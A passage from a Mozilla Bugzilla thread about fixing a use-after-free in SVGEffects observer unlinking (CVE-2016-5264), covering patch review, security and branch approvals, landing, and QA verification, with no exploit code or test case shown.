calls StopListening(), Unlink has been already called so GetTarget() returns null and RemoveMutationObserver doesn't get called in StopListener(). So the observed node keeps notifying the observer, even though the observer has been already deleted.

nsSVGFilterChainObserver has somewhat similar issue with mReferences handling, but I don't know whether one can actually make that code crash. But it sure looks scary since mFilterChainObserver may end up pointing to a deleted object after unlinking.
Attachment #8771139 - Flags: review?(mstange)
FWIW, the patch applies with some --fuzz to aurora and beta too.
Comment on attachment 8771139 [details] [diff] [review]
patch

Review of attachment 8771139 [details] [diff] [review]:
-----------------------------------------------------------------

Looks very reasonable. Thanks!
Attachment #8771139 - Flags: review?(mstange) → review+
Comment on attachment 8771139 [details] [diff] [review]
patch

[Security approval request comment]
How easily could an exploit be constructed based on the patch?
I'd say not very easily

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
Not really. Commit message could be a bit vague:
"Bug 1286183, Improve SVGEffects' unlinking, r=mstange"

Which older supported branches are affected by this flaw?
All (based on code inspection)

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
the patch applies cleanly to Nightly and Aurora, and with some fuzz to beta and esr45

How likely is this patch to cause regressions; how much testing does it need?
Should be safe. Making unlink to do what it should do.
Attachment #8771139 - Flags: sec-approval?
Attachment #8771139 - Flags: approval-mozilla-esr45?
Attachment #8771139 - Flags: approval-mozilla-beta?
Attachment #8771139 - Flags: approval-mozilla-aurora?
Comment on attachment 8771139 [details] [diff] [review]
patch

sec-approval+ for trunk. We should take this everywhere.

Giving Aurora approval as well. I'll let Release Management do the rest.
Attachment #8771139 - Flags: sec-approval?
Attachment #8771139 - Flags: sec-approval+
Attachment #8771139 - Flags: approval-mozilla-aurora?
Attachment #8771139 - Flags: approval-mozilla-aurora+
Keywords: checkin-needed
(In reply to Olli Pettay [:smaug] from comment #10)
> Created attachment 8771160 [details] [diff] [review]
> svg_effects_crash_export.diff

m-i is closed right now, so exported the patch with commit message for checkin-needed.
Group: core-security → dom-core-security
https://hg.mozilla.org/mozilla-central/rev/0a961f12af55
Status: NEW → RESOLVED
Closed: 3 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla50
Comment on attachment 8771139 [details] [diff] [review]
patch

Fix a sec-high, taking it.
Attachment #8771139 - Flags: approval-mozilla-esr45?
Attachment #8771139 - Flags: approval-mozilla-esr45+
Attachment #8771139 - Flags: approval-mozilla-beta?
Attachment #8771139 - Flags: approval-mozilla-beta+
Group: dom-core-security → core-security-release
Flags: qe-verify+
Alias: CVE-2016-5264
Whiteboard: [adv-main48+][adv-esr45.3+]
Firefox no longer crashes using the test case from comment 0.

Tested with:
*Latest 50.0a1 Nightly, build ID 20160726030213
*Latest 49.0a2 Aurora, build ID 20160726004006
*Fx 48 RC, build ID 20160725093659
*ESR 45.3.0, build ID 20160725105554
Flags: sec-bounty?
Flags: sec-bounty? → sec-bounty+
Group: core-security-release
Component: DOM → DOM: Core & HTML
You need to log in before you can comment on or make changes to this bug.